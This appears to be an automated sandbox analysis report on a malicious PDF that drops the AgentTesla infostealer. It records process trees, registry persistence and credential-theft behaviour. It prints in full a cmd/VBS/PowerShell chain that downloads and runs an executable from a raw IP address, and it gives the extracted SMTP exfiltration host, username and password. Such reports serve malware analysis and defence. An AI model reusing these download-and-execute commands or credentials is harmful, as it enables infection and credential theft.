Analysis
- max time kernel: 118s
- max time network: 140s
- platform: windows7_x64
- resource: win7-20231020-en
- resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
- submitted: 12-12-2023 10:52
Behavioral task behavioral1
- Sample: IMG_008542100.pdf
- Resource: win7-20231020-en
Behavioral task behavioral2
- Sample: IMG_008542100.pdf
- Resource: win10v2004-20231127-en
General
- Target: IMG_008542100.pdf
- Size: 1.3MB
- MD5: 2f1d6b1a0ba37b4a5b7a62de21886b18
- SHA1: f0d8b39999e566f5177dfcfb73843a35f62e0100
- SHA256: ca28f4b4337e38b1d178853fc72012895eaee002bec90d907b177623eed6967c
- SHA512: 636b628e22f7ae1c3ca2f2e7323dc0a4787ae8108ed650594d1bdf0d7b3244ac6c3ce4254e5fc24414b30f3821ee5d8dc831d3f2032561221b27b71fc30501ea
- SSDEEP: 24:WbKZ7EjswTw+Lwky3lD6E5wkMMJIWgIXG2CSYapAakwOerXQr/3SlJiNno2fuxk2:tmswTwGwkyV1wkMYXG2lNkmXQbOiN0J
Malware Config
- Extracted (payload URL): http://62.233.57.103/hih/lew.exe
- Extracted (SMTP exfiltration config)
  - Protocol: smtp
  - Host: server1.sqsendy.shop
  - Port: 587
  - Username: [email protected]
  - Password: &qZV17u[D~36
- Extracted (agenttesla)
  - Protocol: smtp
  - Host: server1.sqsendy.shop
  - Port: 587
  - Username: [email protected]
  - Password: &qZV17u[D~36
  - Email To: [email protected]
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Detect ZGRat V1 (34 IoCs)
- Blocklisted process makes network request (1 IoC)
  Processes: flow 4, PID 2968 powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes: PID 2628 lew.exe; PID 2740 lew.exe
- Loads dropped DLL (2 IoCs)
  Processes: PID 2680 cmd.exe; PID 2628 lew.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials, etc.
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: lew.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000\Software\Microsoft\Windows\CurrentVersion\Run\Polsglj = "C:\\Users\\Admin\\AppData\\Roaming\\Polsglj.exe"
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes: flow 8 api.ipify.org; flow 9 api.ipify.org; flow 10 ip-api.com
- Suspicious use of SetThreadContext (1 IoC)
  Processes: PID 2628 lew.exe set thread context of PID 2740 lew.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe (1 IoC)
  Processes: PID 1480 timeout.exe
- Modifies system certificate store
  Processes: lew.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349; Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data elided] (3 entries)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: PID 2968 powershell.exe; PID 2740 lew.exe; PID 2740 lew.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes: PID 1872 AcroRd32.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes: Token: SeDebugPrivilege, PID 2968 powershell.exe; Token: SeDebugPrivilege, PID 2628 lew.exe; Token: SeDebugPrivilege, PID 2740 lew.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes: PID 1872 AcroRd32.exe (4 entries)
- Suspicious use of WriteProcessMemory (33 IoCs)
  Processes (parent wrote to memory of child):
  - PID 1872 AcroRd32.exe -> PID 2664 cmd.exe (4 entries)
  - PID 2664 cmd.exe -> PID 2792 WScript.exe (4 entries)
  - PID 2792 WScript.exe -> PID 2680 cmd.exe (4 entries)
  - PID 2680 cmd.exe -> PID 2968 powershell.exe (4 entries)
  - PID 2680 cmd.exe -> PID 1480 timeout.exe (4 entries)
  - PID 2680 cmd.exe -> PID 2628 lew.exe (4 entries)
  - PID 2628 lew.exe -> PID 2740 lew.exe (9 entries)
Processes
- [1] C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe (PID 1872)
  Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\IMG_008542100.pdf"
  Signatures: Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe (PID 2664)
    Command line: "C:\Windows\System32\cmd.exe" /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start lew.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs PDF Encrypted. Please click
    Signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\WScript.exe (PID 2792)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\encrypted.vbs"
      Signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\cmd.exe (PID 2680)
        Command line: "C:\Windows\System32\cmd.exe" /c msd89h2j389uh.bat
        Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
        - [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2968)
          Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('http://62.233.57.103/hih/lew.exe', 'lew.exe')"
          Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - [5] C:\Windows\SysWOW64\timeout.exe (PID 1480)
          Command line: timeout /t 5
          Signatures: Delays execution with timeout.exe
        - [5] C:\Users\Admin\AppData\Local\Temp\lew.exe (PID 2628)
          Command line: lew.exe
          Signatures: Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - [6] C:\Users\Admin\AppData\Local\Temp\lew.exe (PID 2740)
            Command line: C:\Users\Admin\AppData\Local\Temp\lew.exe
            Signatures: Executes dropped EXE; Modifies system certificate store; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Downloads